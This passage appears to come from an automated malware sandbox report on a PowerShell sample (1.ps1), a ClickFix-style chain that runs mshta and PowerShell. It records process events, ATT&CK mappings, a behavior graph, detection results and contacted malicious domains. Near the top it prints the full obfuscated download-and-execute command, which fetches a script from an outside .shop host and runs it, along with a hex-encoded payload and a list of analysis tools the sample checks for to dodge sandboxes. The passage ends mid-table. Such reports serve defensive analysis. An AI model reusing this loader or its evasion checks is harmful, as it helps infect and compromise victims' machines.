c93790f2b789b1d7f8af2755f7862a0e0238a32a772d6a2732b3095daad4eb0e7d9915b8cb5b83c7fd80951d9638ef55a6375a4b0a1a6a39486bd42703740d4739f14c284bad645b7aead8ac307e2b9086d4067f09951fb60accfb3c645ef7029257e657db2c75969e04cea94922cba886ee7fb2c5094b35b47b3e5a6d070e4c8f6bff03bf56a6b5e69db983ec5ac0059a752a08b6681bbf75be4896545506145ace95dffdbf434e62e3ea18a82fb864dbaaf7024875dfaad3455165f3e298c179e9c1bb64e557e51b265c18627c5213911a94a996ded9faf3d
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -w hidden -ep bypass -nop -command gdr -*;set-variable ciu (.$executioncontext.(($executioncontext|member)[6].name).(($executioncontext.(($executioncontext|member)[6].name)|member|where-object{$_.name-like'*t*om*d'}).name).invoke($executioncontext.(($executioncontext|member)[6].name).(($executioncontext.(($executioncontext|member)[6].name).psobject.methods|where-object{$_.name-like'*om*e'}).name).invoke('n*-o*',$true,$true),[management.automation.commandtypes]::cmdlet)net.webclient);set-item variable:/lw 'https://deduhko.klipzyroloo.shop/mazkk.eml';[scriptblock]::create((gi variable:ciu).value.((((gi variable:ciu).value|member)|where-object{$_.name-like'*nl*g'}).name).invoke((variable lw).value)).invokereturnasis()
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -ep unrestricted -nop function frszn($zlkrb){return -split ($zlkrb -replace '..', '0x$& ')};$vuqbu = frszn('c3a33c52a21c41b9f45dd91b9a3bf30cf2ec6edd823c9cece83ad45776a5b6cca18208e15a52df5b7f83353d6e23bd618f30020318aa0658a8b9202e85f786765caab181b34d40f3e1afbb439a24557ca57621a37bd3fd396effd4a447891c80c3a87a883d5313addb72306d4184811757153e08edd2ef4becf037797b4b79f777c6223cc775bc4b03cc115c23ad1596e113a7f8e74eb4eec5e6d17a73f590bca9be30fe8de26e4f3f386bc2b0df4c8b789f385d01cc9deefe7ffe963cad5b715105e46717c1f8ca599aac7c726247b67b2ef008d6815624c48d8921d6c026c2d761b3c73420e46d41eb38b2be6dc3a6e728398be20df964e092c95fff64376795c2eb65f33ec3620d837926668055a522e8a88ac3164b0ffa0fe44948e6327c8e69269e914364f60006f48eb7a2f9830777b3c6bc5165322ac78640320b0b34d2aa9c9ef97d71caf1be1edd212144c4e5eda5048bffd67a1dae7b36d7277064edf983455e52e8a0a77bcef0fa38ab0c8d4ea1fca20a03b622cfd25f156452a918d62ccd80d0060df532d92d537f9e1ecc41864005c3c9e067c14930765854957efb5e71dda020e9c8287b2f961f0bdc387138260abc45fb51ea8ae2b650d5b9c6e9c5687580b83cc67faabc67d590702c85406ab842938c6700bdee21992168619bea16916fb865dc5f6df6d9f4f1b2cca2d2bf385a560e8f04c765355464b3f06bdd88ea77e44a2d1776f2b6cd01864cfee829fb17a5e70d006d79c119dc5f57a9a25aa984aa5b1704215ffbc39398a42cb74f3594aa3d56dae65b45e14cc7b4611364ce10e2a98948a4408130f9c618d3f505b018949f27c940b9058868e152dd2a4787f24ad17bf0a1f6bf9df717f3bfd33dc5a1972c3919f13aee4cb268c7dc3f54cf3ac0ee2ba15d2c8d82c9a8c7b8b2a0fd03b7aa09ea4f38e2b6fd1c519eacedae21d18fb3b6cbb0a3cd5570de3f6c90d36eaa1e063743143eba60b985de8361c93ec0d22bcad34d88804a5c111c47c68ee0d30ac9c64f3ae88ba57295f333c3b513e91ef96441c281655217ba1de5c3fdec2419e6ddac538710d679ff0df83b2ebe940e136711ed6c3c0fbfad98c9cd7fceeb3415207acaaa8f091cdd9d584db90bd37d6e6aa2be9e6344e6c4a74a99dbc82a78e28f9aaba7bab79ef7ecd2ec5397e326870a7a51e0d74d954c0215e1baa229e0816aabbcb00a25173c21e313511b1c978fd55355adfbf4e15ebd0a9b52c25e32ea220c9d9dbacd18ee9ceec99257188138d0abbd29c4dffc9b960a9cec94df767700576a1ef94d8b5f25088c95cb11f2ac671514479e6568df04f03553a9607589926aabeedce4449e803e102f7e84665c1edbe23e8c0d5dfab8c81bc5277aaaa134c26cd84c912045fee79030eaf24569738bdc109fe8349634563c2f5ee96e70c6932af1ab2c27f468aa44a2b4e2abebb52f245ab3e0b51a5d301366672fe9f491d4f1038b32f46286f25d8d40248a896053e14be3da4565ab47483a26ab50d34af15bfc76980b08272d58f9cab8f88e13142e13805c1eca94d3c7934eab6a74c1baa74cd734574037b043e95c8086cfe97d42c4b9a7f1c21bc9fe6ffec1daf361c9a765c5c0a9e41d0d9fde014881d03d024f34a7ebc93790f2b789b1d7f8af2755f7862a0e0238a32a772d6a2732b3095daad4eb0e7d9915b8cb5b83c7fd80951d9638ef55a6375a4b0a1a6a39486bd42703740d4739f14c284bad645b7aead8ac307e2b9086d4067f09951fb60accfb3c645ef7029257e657db2c75969e04cea94922cba886ee7fb2c5094b35b47b3e5a6d070e4c8f6bff03bf56a6b5e69db983ec5ac0059a752a08b6681bbf75be4896545506145ace95dffdbf434e62e3ea18a82fb864dbaaf7024875dfaad3455165f3e298c179e9c1bb64e557e51b265c18627c5213911a94a996ded9faf3dJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -w hidden -ep bypass -nop -command gdr -*;set-variable ciu (.$executioncontext.(($executioncontext|member)[6].name).(($executioncontext.(($executioncontext|member)[6].name)|member|where-object{$_.name-like'*t*om*d'}).name).invoke($executioncontext.(($executioncontext|member)[6].name).(($executioncontext.(($executioncontext|member)[6].name).psobject.methods|where-object{$_.name-like'*om*e'}).name).invoke('n*-o*',$true,$true),[management.automation.commandtypes]::cmdlet)net.webclient);set-item variable:/lw 'https://deduhko.klipzyroloo.shop/mazkk.eml';[scriptblock]::create((gi variable:ciu).value.((((gi variable:ciu).value|member)|where-object{$_.name-like'*nl*g'}).name).invoke((variable lw).value)).invokereturnasis() Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WSMan.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Management.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: powershell.exe, 00000004.00000002.1811581786.000001E5D980C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OllyDbg.exe
Source: powershell.exe, 00000004.00000002.1811581786.000001E5D980C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tcpview.exe
Source: powershell.exe, 00000004.00000002.1811581786.000001E5D980C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Wireshark.exe
Source: powershell.exe, 00000004.00000002.1811581786.000001E5D980C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: lordpe.exe
Source: powershell.exe, 00000004.00000002.1811581786.000001E5D980C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: procexp.exe
Source: powershell.exe, 00000004.00000002.1811581786.000001E5D980C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Procmon.exe
Source: powershell.exe, 00000004.00000002.1811581786.000001E5D980C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: autoruns.exe
Source: powershell.exe, 00000004.00000002.1811581786.000001E5D980C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: regmon.exe

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
Windows Management Instrumentation		1
DLL Side-Loading		11
Process Injection		11
Masquerading		OS Credential Dumping121
Security Software Discovery		Remote Services1
Email Collection		11
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts22
Command and Scripting Interpreter		Boot or Logon Initialization Scripts1
DLL Side-Loading		31
Virtualization/Sandbox Evasion		LSASS Memory1
Process Discovery		Remote Desktop Protocol1
Archive Collected Data		1
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts2
PowerShell		Logon Script (Windows)Logon Script (Windows)11
Process Injection		Security Account Manager31
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Obfuscated Files or Information		NTDS1
Application Window Discovery		Distributed Component Object ModelInput Capture13
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading		LSA Secrets1
File and Directory Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials23
System Information Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1582960 Sample: 1.ps1 Startdate: 01/01/2025 Architecture: WINDOWS Score: 84 35 deduhko.klipzyroloo.shop 2->35 37 solve.vwglq.com 2->37 39 deduhko2.kliphuwatey.shop 2->39 45 Malicious sample detected (through community Yara rule) 2->45 47 Antivirus detection for URL or domain 2->47 49 Sigma detected: Suspicious MSHTA Child Process 2->49 51 3 other signatures 2->51 10 powershell.exe 11 2->10         started        13 svchost.exe 1 1 2->13         started        signatures3 process4 dnsIp5 57 Suspicious powershell command line found 10->57 59 Bypasses PowerShell execution policy 10->59 16 mshta.exe 17 10->16         started        20 conhost.exe 10->20         started        41 127.0.0.1 unknown unknown 13->41 signatures6 process7 dnsIp8 31 deduhko.klipzyroloo.shop 188.114.97.3, 443, 49730, 49737 CLOUDFLARENETUS European Union 16->31 33 deduhko2.kliphuwatey.shop 172.67.144.62, 443, 49731 CLOUDFLARENETUS United States 16->33 43 Suspicious powershell command line found 16->43 22 powershell.exe 16 16->22         started        signatures9 process10 signatures11 53 Suspicious powershell command line found 22->53 55 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 22->55 25 powershell.exe 15 26 22->25         started        27 conhost.exe 22->27         started        process12 process13 29 conhost.exe 25->29         started       

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
1.ps10%VirustotalBrowse
1.ps10%ReversingLabs

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://solve.vw0%Avira URL Cloudsafe
https://solve.vwglq.com/awjxs.captcha?u=6c079280-654d-44b7-add6-a7ba0821d64dV0%Avira URL Cloudsafe
https://deduhko2.kliphuwatey.shop/Poket.mp4/0%Avira URL Cloudsafe
https://deduhko.klipzyroloo.shop100%Avira URL Cloudmalware
https://solve.vwglq.com/awjxs.captcha?u=6c079280-654d-44b7-add6-a7ba0821d64dP0%Avira URL Cloudsafe
https://solve.vwglq.com/awjxs.captcha?u=6c079280-654d-44b7-add6-a7ba0821d64dS0%Avira URL Cloudsafe
https://deduhko2.kliphuwatey.shop/Poket.mp4public0%Avira URL Cloudsafe
https://deduhko2.kliphuwatey.shop/Poket.mp4RRC:0%Avira URL Cloudsafe
https://solve.vwglq.com/awjxs.captcha?u=6c079280-654d-44b7-add6-a7ba0821d64dl0%Avira URL Cloudsafe
https://deduhko.kl0%Avira URL Cloudsafe
https://solve.vwglq.com/awjxs.captcha?u=6c079280-654d-44b7-add6-a7ba0821d64dh0%Avira URL Cloudsafe
https://deduhko2.kliphuwatey.shop/Px&0%Avira URL Cloudsafe
http://deduhko.klipzyroloo.shop100%Avira URL Cloudmalware
https://deduhko2.kliphuwatey.shop/Poket.mp49280-654d-44b7-add6-a7ba0821d64d:0%Avira URL Cloudsafe
https://deduhko2.kliphuwatey.shop/Poket.mp4G0%Avira URL Cloudsafe
https://deduhko.klipzyroloo.shop/mazkk.eml100%Avira URL Cloudmalware
http://crl.microsoftvu0%Avira URL Cloudsafe
https://deduhko2.kliphuwatey.shop/Poket.mp4https://deduhko2.kliphuwatey.shop/Poket.mp40%Avira URL Cloudsafe
https://deduhko2.kliphuwatey.shop/Poket.mp470%Avira URL Cloudsafe
https://deduhko2.kliphuwatey.shop/0%Avira URL Cloudsafe
https://solve.vwX0%Avira URL Cloudsafe
https://deduhko2.kliphuwatey.shop/Poket.mp4n0%Avira URL Cloudsafe
https://deduhko2.kliphuwatey.shop/Poket.mp4...s0%Avira URL Cloudsafe
https://deduhko2.kliphuwatey.shop/Poket.mp4_0%Avira URL Cloudsafe
https://deduhko2.kliphuwatey.shop/Poket.mp4Y0%Avira URL Cloudsafe
https://solve.vwglq.com/Z0%Avira URL Cloudsafe
https://solve.vwglq.com/awjxs.captcha?u=6c079280-654d-44b7-add6-a7ba0821d64d0%Avira URL Cloudsafe
https://solve.vwglq.com/awjxs.captcha?u=6c079280-654d-44b7-add6-a7ba0821d64dC:0%Avira URL Cloudsafe
https://solve.vwglq.com/R0%Avira URL Cloudsafe
https://solve.vwglq.com/awjxs.captcha?u=6c079280-654d-44b7-add6-a7ba0821d64d.0%Avira URL Cloudsafe
https://deduhko2.kliphuwatey.shop/Poket.mp4...0%Avira URL Cloudsafe
https://solve.vwglq.com/awjxs.captcha?u=6c079280-654d-44b7-add6-a7ba0821d64dlorerY)0%Avira URL Cloudsafe
https://deduhko2.kliphuwatey.shop/Poket.mp4w0%Avira URL Cloudsafe
https://deduhko2.kliphuwatey.shop/Poket.mp4LMEMX0%Avira URL Cloudsafe
https://deduhko2.kliphuwatey.shop/Poket.mp40%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
deduhko2.kliphuwatey.shop
172.67.144.62
truefalse
    		high
    solve.vwglq.com
    		188.114.97.3
    		truefalse
      		high
      deduhko.klipzyroloo.shop
      		188.114.97.3
      		truetrue
        		unknown

        Contacted URLs

        NameMaliciousAntivirus DetectionReputation
        https://deduhko.klipzyroloo.shop/mazkk.emltrue
        • Avira URL Cloud: malware
        		unknown
        https://solve.vwglq.com/awjxs.captcha?u=6c079280-654d-44b7-add6-a7ba0821d64dtrue
        • Avira URL Cloud: safe
        		unknown
        https://deduhko2.kliphuwatey.shop/Poket.mp4false
        • Avira URL Cloud: safe
        		unknown

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        https://solve.vwpowershell.exe, 00000000.00000002.1667002839.0000018B80530000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1667002839.0000018B804F4000.00000004.00000800.00020000.00000000.sdmptrue
        • Avira URL Cloud: safe
        		unknown
        https://solve.vwglq.com/awjxs.captcha?u=6c079280-654d-44b7-add6-a7ba0821d64dSmshta.exe, 00000002.00000002.1893827664.000001F01B48E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1878800373.000001F01B48E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1886170270.000001F01B48E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1876192068.000001F01B48D000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        https://solve.vwglq.com/awjxs.captcha?u=6c079280-654d-44b7-add6-a7ba0821d64dVmshta.exe, 00000002.00000003.1878800373.000001F01B4C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1886170270.000001F01B4C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.1893827664.000001F01B4C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1876192068.000001F01B4C4000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        https://deduhko2.kliphuwatey.shop/Poket.mp4/mshta.exe, 00000002.00000003.1889195285.000001F822FFD000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889590451.000001F823005000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888754132.000001F822FF7000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889063925.000001F822FFA000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1887904137.000001F822FF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889479003.000001F823003000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888185929.000001F822FF2000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889271980.000001F822FFE000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889447053.000001F823002000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889622801.000001F823007000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1887972960.000001F822FF1000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889160464.000001F822FFC000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888525631.000001F822FF5000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889553217.000001F823004000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888784854.000001F822FF8000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889409060.000001F823001000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889099790.000001F822FFB000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889336187.000001F822FFF000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888341622.000001F822FF3000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888981789.000001F822FF9000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 